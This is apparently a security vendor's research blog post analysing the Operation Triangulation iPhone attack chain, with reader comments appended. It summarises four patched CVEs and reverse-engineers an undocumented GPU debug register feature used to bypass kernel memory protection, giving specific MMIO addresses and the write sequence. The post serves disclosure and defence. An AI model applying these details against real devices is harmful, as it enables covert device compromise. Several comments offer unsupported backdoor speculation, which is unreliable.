Research

Operation Triangulation: The last (hardware) mystery

Today, on December 27, 2023, we (Boris Larin, Leonid Bezvershenko, and Georgy Kucherin) delivered a presentation, titled, “Operation Triangulation: What You Get When Attack iPhones of Researchers”, at the 37th Chaos Communication Congress (37C3), held at Congress Center Hamburg. The presentation summarized the results of our long-term research into Operation Triangulation, conducted with our colleagues, Igor Kuznetsov, Valentin Pashkov, and Mikhail Vinogradov.

This presentation was also the first time we had publicly disclosed the details of all exploits and vulnerabilities that were used in the attack. We discover and analyze new exploits and attacks using these on a daily basis, and we have discovered and reported more than thirty in-the-wild zero-days in Adobe, Apple, Google, and Microsoft products, but this is definitely the most sophisticated attack chain we have ever seen.

Operation Triangulation’ attack chain

Here is a quick rundown of this 0-click iMessage attack, which used four zero-days and was designed to work on iOS versions up to iOS 16.2.

  • Attackers send a malicious iMessage attachment, which the application processes without showing any signs to the user.
  • This attachment exploits the remote code execution vulnerability CVE-2023-41990 in the undocumented, Apple-only ADJUST TrueType font instruction. This instruction had existed since the early nineties before a patch removed it.
  • It uses return/jump oriented programming and multiple stages written in the NSExpression/NSPredicate query language, patching the JavaScriptCore library environment to execute a privilege escalation exploit written in JavaScript.
  • This JavaScript exploit is obfuscated to make it completely unreadable and to minimize its size. Still, it has around 11,000 lines of code, which are mainly dedicated to JavaScriptCore and kernel memory parsing and manipulation.
  • It exploits the JavaScriptCore debugging feature DollarVM ($vm) to gain the ability to manipulate JavaScriptCore’s memory from the script and execute native API functions.
  • It was designed to support both old and new iPhones and included a Pointer Authentication Code (PAC) bypass for exploitation of recent models.
  • It uses the integer overflow vulnerability CVE-2023-32434 in XNU’s memory mapping syscalls (mach_make_memory_entry and vm_map) to obtain read/write access to the entire physical memory of the device at user level.
  • It uses hardware memory-mapped I/O (MMIO) registers to bypass the Page Protection Layer (PPL). This was mitigated as CVE-2023-38606.
  • After exploiting all the vulnerabilities, the JavaScript exploit can do whatever it wants to the device including running spyware, but the attackers chose to: (a) launch the IMAgent process and inject a payload that clears the exploitation artefacts from the device; (b) run a Safari process in invisible mode and forward it to a web page with the next stage.
  • The web page has a script that verifies the victim and, if the checks pass, receives the next stage: the Safari exploit.
  • The Safari exploit uses CVE-2023-32435 to execute a shellcode.
  • The shellcode executes another kernel exploit in the form of a Mach object file. It uses the same vulnerabilities: CVE-2023-32434 and CVE-2023-38606. It is also massive in terms of size and functionality, but completely different from the kernel exploit written in JavaScript. Certain parts related to exploitation of the above-mentioned vulnerabilities are all that the two share. Still, most of its code is also dedicated to parsing and manipulation of the kernel memory. It contains various post-exploitation utilities, which are mostly unused.
  • The exploit obtains root privileges and proceeds to execute other stages, which load spyware. We covered these stages in our previous posts.

We are almost done reverse-engineering every aspect of this attack chain, and we will be releasing a series of articles next year detailing each vulnerability and how it was exploited.

However, there are certain aspects to one particular vulnerability that we have not been able to fully understand.

The mystery and the CVE-2023-38606 vulnerability

What we want to discuss is related to the vulnerability that has been mitigated as CVE-2023-38606. Recent iPhone models have additional hardware-based security protection for sensitive regions of the kernel memory. This protection prevents attackers from obtaining full control over the device if they can read and write kernel memory, as achieved in this attack by exploiting CVE-2023-32434. We discovered that to bypass this hardware-based security protection, the attackers used another hardware feature of Apple-designed SoCs.

If we try to describe this feature and how the attackers took advantage of it, it all comes down to this: they are able to write data to a certain physical address while bypassing the hardware-based memory protection by writing the data, destination address, and data hash to unknown hardware registers of the chip unused by the firmware.

Our guess is that this unknown hardware feature was most likely intended to be used for debugging or testing purposes by Apple engineers or the factory, or that it was included by mistake. Because this feature is not used by the firmware, we have no idea how attackers would know how to use it.

We are publishing the technical details, so that other iOS security researchers can confirm our findings and come up with possible explanations of how the attackers learned about this hardware feature.

Technical details

Various peripheral devices available in the SoC may provide special hardware registers that can be used by the CPU to operate these devices. For this to work, these hardware registers are mapped to the memory accessible by the CPU and are known as “memory-mapped I/O (MMIO)“.

Address ranges for MMIOs of peripheral devices in Apple products (iPhones, Macs, and others) are stored in a special file format: DeviceTree. Device tree files can be extracted from the firmware, and their contents can be viewed with the help of the dt utility.

Example of how MMIO ranges are stored in the device tree

For example, in this screenshot, you can see the start (0x210f00000) and the size (0x50000) of the acc-impl MMIO range for cpu0.

While analyzing the exploit used in the Operation Triangulation attack, I discovered that most of the MMIOs used by the attackers to bypass the hardware-based kernel memory protection do not belong to any MMIO ranges defined in the device tree. The exploit targets Apple A12–A16 Bionic SoCs, targeting unknown MMIO blocks of registers that are located at the following addresses: 0x206040000, 0x206140000, and 0x206150000.

The prompted me to try something. I checked different device tree files for different devices and different firmware files: no luck. I checked publicly available source code: no luck. I checked the kernel images, kernel extensions, iboot, and coprocessor firmware in search of a direct reference to these addresses: nothing.

How could it be that that the exploit used MMIOs that were not used by the firmware? How did the attackers find out about them? What peripheral device(s) do these MMIO addresses belong to?

It occurred to me that I should check what other known MMIOs were located in the area close to these unknown MMIO blocks. That approach was successful.

Let us take a look at a dump of the device tree entry for gfx-asc, which is the GPU coprocessor.

Dump of the device tree entry for gfx-asc

It has two MMIO ranges: 0x206400000–0x20646C000 and 0x206050000–0x206050008. Let us take a look at how they correlate with the regions used by the exploit.

Correlation of the gfx-asc MMIO ranges and the addresses used by the exploit

To be more precise, the exploit uses the following unknown addresses: 0x206040000, 0x206140008, 0x206140108, 0x206150020, 0x206150040, and 0x206150048. We can see that most of these are located in the area between the two gfx-asc regions, and the remaining one is located close to the beginning of the first gfx-asc region. This suggested that all these MMIO registers most likely belonged to the GPU coprocessor!

After that, I took a closer look at the exploit and found one more thing that confirmed my theory. The first thing the exploit does during initialization is writing to some other MMIO register, which is located at a different address for each SoC.

Pseudocode for the GFX power manager control code from the exploit

With the help of the device tree and Siguza’s utility, pmgr, I was able to discover that all these addresses corresponded to the GFX register in the power manager MMIO range.

Finally, I obtained a third confirmation when I decided to try and access the registers located in these unknown regions. Almost instantly, the GPU coprocessor panicked with a message of, “GFX SERROR Exception class=0x2f (SError interrupt), IL=1, iss=0 – power(1)”.

This way, I was able to confirm that all these unknown MMIO registers used for the exploitation belonged to the GPU coprocessor. This motivated me to take a deeper look at its firmware, which is also written in ARM and unencrypted, but I could not find anything related to these registers in there.

I decided to take a closer look at how the exploit operated these unknown MMIO registers. The register 0x206040000 stands out from all the others because it is located in a separate MMIO block from all the other registers. It is touched only during the initialization and finalization stages of the exploit: it is the first register to be set during initialization and the last one, during finalization. From my experience, it was clear that the register either enabled/disabled the hardware feature used by the exploit or controlled interrupts. I started to follow the interrupt route, and fairly soon, I was able to recognize this unknown register, 0x206040000, and also discovered what exactly was mapped to the address range of 0x206000000–0x206050000. Below, you can see the reverse-engineered code of the exploit that I was able to recognize. I have given it a proper name.

Pseudocode for the usage of the, 0x206040000 register by the exploit

I was able to match the ml_dbgwrap_halt_cpu function from the pseudocode above to a function with the same name in the dbgwrap.c file of the XNU source code. This file contains code for working with the ARM CoreSight MMIO debug registers of the main CPU. The source code states that there are four CoreSight-related MMIO regions, named ED, CTI, PMU, and UTT. Each  occupies 0x10000 bytes, and they are all located next to one another. The ml_dbgwrap_halt_cpu function uses the UTT region, and the source code states that, unlike the other three, it does not come from ARM, but is a proprietary Apple feature that was added just for convenience.

I was able to confirm that 0x206000000–0x206050000 was indeed a block of CoreSight MMIO debug registers for the GPU coprocessor by writing ARM_DBG_LOCK_ACCESS_KEY to the corresponding location. Each core of the main CPU has its own block of CoreSight MMIO debug registers, but unlike the GPU coprocessor, their addresses can be found in the device tree.

It is also interesting that the author(s) of this exploit knew how to use the proprietary Apple UTT region to unhalt the CPU: this code is not part of the XNU source code. Perhaps it is fair to say that this could easily be found out through experimentation.

Something that cannot be found that way is what the attackers did with the registers in the second unknown region. I am not sure what blocks of MMIO debug registers are located there, or how the attackers found out how to use them if they were not used by the firmware.

Let us look at the remaining unknown registers used by the exploit.

The registers 0x206140008 and 0x206140108 control enabling/disabling and running the hardware feature used by the exploit.

Pseudocode for the usage of the 0x206140008 and 0x206140108 registers by the exploit

The register 0x206150020 is used only for Apple A15/A16 Bionic SoCs. It is set to 1 during the initialization stage of the exploit, and to its original value, during the finalization stage.

The register 0x206150040 is used to store some flags and the lower half of the destination physical address.

The last register, 0x206150048, is used for storing the data that needs to be written and the upper half of the destination physical address, bundled together with the data hash and another value (possibly a command). This hardware feature writes the data in aligned blocks of 0x40 bytes, and everything should be written to the 0x206150048 register in nine sequential writes.

Pseudocode for the usage of the 0x206150040 and 0x206150048 registers by the exploit

As long as everything is done correctly, the hardware should perform a direct memory access (DMA) operation and write the data to the requested location.

The exploit uses this hardware feature as a Page Protection Layer (PPL) bypass, mainly for patching page table entries. It can also be used for patching the data in the protected __PPLDATA segment. The exploit does not use the feature to patch the kernel code, but once during a test, I was able to overwrite an instruction in the __TEXT_EXEC segment of the kernel and get an “Undefined Kernel Instruction” panic with the expected address and value. This only worked once—the other times I tried I got an AMCC panic. I have an idea about what I did right that one time it worked, and I am planning to look deeper into this in the future, because I think it would be really cool to take a vulnerability that was used to harm us and use it for something good, like enabling kernel debugging on new iPhones.

Now that all the work with all the MMIO registers has been covered, let us take a look at one last thing: how hashes are calculated. The algorithm is shown below.

Pseudocode for the hash function used by this unknown hardware feature

As you can see, it is a custom algorithm, and the hash is calculated by using a predefined sbox table. I tried to search for it in a large collection of binaries, but found nothing.

You may notice that this hash does not look very secure, as it occupies just 20 bits (10+10, as it is calculated twice), but it does its job as long as no one knows how to calculate and use it. It is best summarized with the term “security by obscurity“.

How could attackers discover and exploit this hardware feature if it is not used and there are no instructions anywhere in the firmware on how to use it?

I ran one more test. I checked and found that the M1 chip inside the Mac also has this unknown hardware feature. Then I used the amazing  m1n1 tool to conduct an experiment. This tool has a trace_range function, which traces all access to a provided range of MMIO registers. I used it to set up tracing for the memory range 0x206110000–0x206400000, but it reported no usage of these registers by macOS.

Through an amazing coincidence, both my 37C3 presentation and this post discuss a vulnerability very similar to the one I talked about during my presentation at the 36th Chaos Communication Congress (36C3) in 2019.

In the presentation titled, “Hacking Sony PlayStation Blu-ray Drives”, I talked about how I was able to dump firmware and achieve code execution on the Blu-ray drives of Sony PlayStation 3 and 4 by using MMIO DMA registers that were accessible through SCSI commands.

I was able to discover and exploit this vulnerability, because earlier versions of the firmware used these registers for all DRAM operations, but then Sony stopped using them and started just accessing DRAM directly, because all DRAM was also mapped to the CPU address space. Because no one was using these registers anymore and I knew how to use them, I took advantage of them. It did not need to know any secret hash algorithm.

Could something similar have happened in this case? I do not know that, but this GPU coprocessor first appeared in the recent Apple SoCs. In my personal opinion, based on all the information that I provided above, I highly doubt that this hardware feature was previously used for anything in retail firmware. Nevertheless, there is a possibility that it was previously revealed by mistake in some particular firmware or XNU source code release and then removed.

I was hoping to find out what was located inside the second unknown region from the fix for this vulnerability implemented in iOS 16.6. I was able to find out how Apple mitigated this issue, but they obfuscated the fix.

Apple mitigated this vulnerability by adding the MMIO ranges 0x206000000–0x206050000 and 0x206110000–0x206400000 used by the exploit to the pmap-io-ranges stored in the device tree. XNU uses the information stored there to determine whether to allow mapping of certain physical addresses. All entries stored there have a meaningful tag name that explains what kind of memory the range belongs to.

Example of entries stored in the pmap-io-ranges

Here, PCIe stands for “Peripheral Component Interconnect Express”, DART stands for “Device Address Resolution Table”, DAPF means “Device Address Filter”, and so on.

And here are the tag names for regions used by the exploit. They stand out from the rest.

Entries for regions used by the exploit

Conclusion

This is no ordinary vulnerability, and we have many unanswered questions. We do not know how the attackers learned to use this unknown hardware feature or what its original purpose was. Neither do we know if it was developed by Apple or it’s a third-party component like ARM CoreSight.

What we do know—and what this vulnerability demonstrates—is that advanced hardware-based protections are useless in the face of a sophisticated attacker as long as there are hardware features that can bypass those protections.

Hardware security very often relies on “security through obscurity”, and it is much more difficult to reverse-engineer than software, but this is a flawed approach, because sooner or later, all secrets are revealed. Systems that rely on “security through obscurity” can never be truly secure.

Update 2024-01-09

Famous hardware hacker Hector Martin (marcan) was able to figure out that what we thought was a custom hash was actually something a little different. It is an error correction code (ECC), or more precisely, a Hamming code with a custom lookup table (what we call “sbox table” in the text above).

This discovery helps us understand the original purpose of this unknown hardware feature. We originally thought it was a debugging feature that provided direct memory access to the memory and was protected with a “dummy” hash for extra security. But the fact that it involves an ECC, coupled with the unstable behavior observed when trying to use it to patch the kernel code, leads to the conclusion that this hardware feature provides direct memory access to the cache.

This discovery also raises the possibility that this unused hardware feature could have been found through experimentation, but to do so would require attackers to solve a large number of unknown variables. Attackers could find values in a custom lookup table using brute force, but they would also need to know that such a powerful cache debugging feature exists, that it involves Hamming code and, most importantly, they would need to know the location and purpose of all the MMIO registers involved, and how and in what order to interact with them. Were the attackers able to resolve all these unknown variables by themselves or was this information revealed somewhere by mistake? It still remains a mystery.

Operation Triangulation: The last (hardware) mystery

Your email address will not be published. Required fields are marked *

 

  1. Agronymous Coward

    As you say, so weird that they had all those components to access an undocumented feature like that successfully. Surely Apple need to issue more of an explanation?

    Interesting that the earliest affected GPU is A12 as that was the first ‘real’ Apple designed GPU – according to Anandtech (https://www.anandtech.com/show/13392/the-iphone-xs-xs-max-review-unveiling-the-silicon-secrets/2)

    Could that imply that the naughty MMIO pathway had to be Apple created rather than a throwback to ARM (like Coresight) or PowerVR IP?

    Also I see you used m1n1 but have you had any discussion with the Asahi Linux crew? They have patches for the G11P along with the other Apple GPUs and may recognise something?

  2. Wes

    Does this exploit affect phones running in Lockdown mode?

    1. Marku Wolf

      yes

    2. HCS

      Gensran this is a hardware level vulnerability. The after that question is yes. The only way you would not get this thing used against you if you were the target is for you to never have the phone online so you’d have to have all radios all remote connectivity everything turned off.

  3. Eddy

    Even though I don’t understand a lot of it, I wanted to say amazing work Boris for deconstructing the whole thing, wow.

    1. Wiz

      Thanks bro,for informing us.

  4. Reuben Johnston

    The academic community needs more case study examples like this one. Thank you to the authors for sharing this research!

  5. Hasan Kilid

    If something like this had happened to huawei/xiaomi, they call it chinese HW backdoor
    But there are not any backdoor in US products :))

  6. Josh

    I wouldn’t say an API that requires a custom hash with a custom SBOX is security by obscurity. It’s bigger key than most ciphers.

  7. Dennis

    If this “hidden feature” was known to Apple, it’s extremely suspicious and points to a likely Apple/NSA PRISM-like backdoor collaboration.

  8. Amun

    Is there a way to detect and/or block such attacks?

  9. SvengaliExploit

    In my mind this feels like an intentionally designed backdoor for bypassing hardware security.

  10. Francisco

    Un posible backdoor ,espionaje industrial? Espionaje en masa?

  11. AGRONYMOUS COW HERD

    The implications of the comment by AGRONYMOUS COWARD Posted on December 28, 2023 are significant. If correct they indicate a deliberately introduced hardware backdoor communicated to an external third party by the manufacturer. This has happened before.
    https://en.wikipedia.org/wiki/Clipper_chip
    https://www.forbes.com/sites/daveywinder/2020/02/12/cia-secretly-bought-global-encryption-provider-built-backdoors-spied-on-100-foreign-governments/

  12. Glorby

    How this compares to Pegasus?

  13. Thagorus.py

    Incredible sleuthing. Thanks

  14. Lateral

    Perhaps i missed it but i didn’t see what tore of attachment was used.
    Was it a pdf or could it be a PDF?

    1. Securelist

      Hi Lateral!

      The file containing the malicious exploit was a PDF one.

  15. Walnut

    Would the implementation of ARM hardware MTE prevent the effectiveness of the type of kernel exploits used in Triangulation?

  16. Paul C

    I imagine that the undocumented mmio are used for component testing in the factory and perhaps by apple’s proprietary Genius Bar diagnostic test suite. Also public header files for various frameworks often include struct definitions of “unused” registers.

  17. Gabe

    Could it have anything to do with Cryptex OS and deploying security updates? Leveraging this hardware as a stand alone to provide rapid security response so it does not leverage the currently effected hardware of the users iPhone.

    I’m not an engineer but I’ve read all my logs and it’s usually the Cryptex OS that’s creating events on XNU, NSE, ANE.

    I’ve also noticed that some logs say ARM and others say ARMe. I haven’t checked against your regions yet but I will and I thank you for doing this and for being a good guy hacker!

Reports

BlindEagle flying high in Latin America

Kaspersky shares insights into the activity and TTPs of the BlindEagle APT, which targets organizations and individuals in Colombia, Ecuador, Chile, Panama and other Latin American countries.

APT trends report Q2 2024

The report features the most significant developments relating to APT groups in Q2 2024, including the new backdoor in Linux utility XZ, a new RAT called SalmonQT, and hacktivist activity.

Subscribe to our weekly e-mails

The hottest research right in your inbox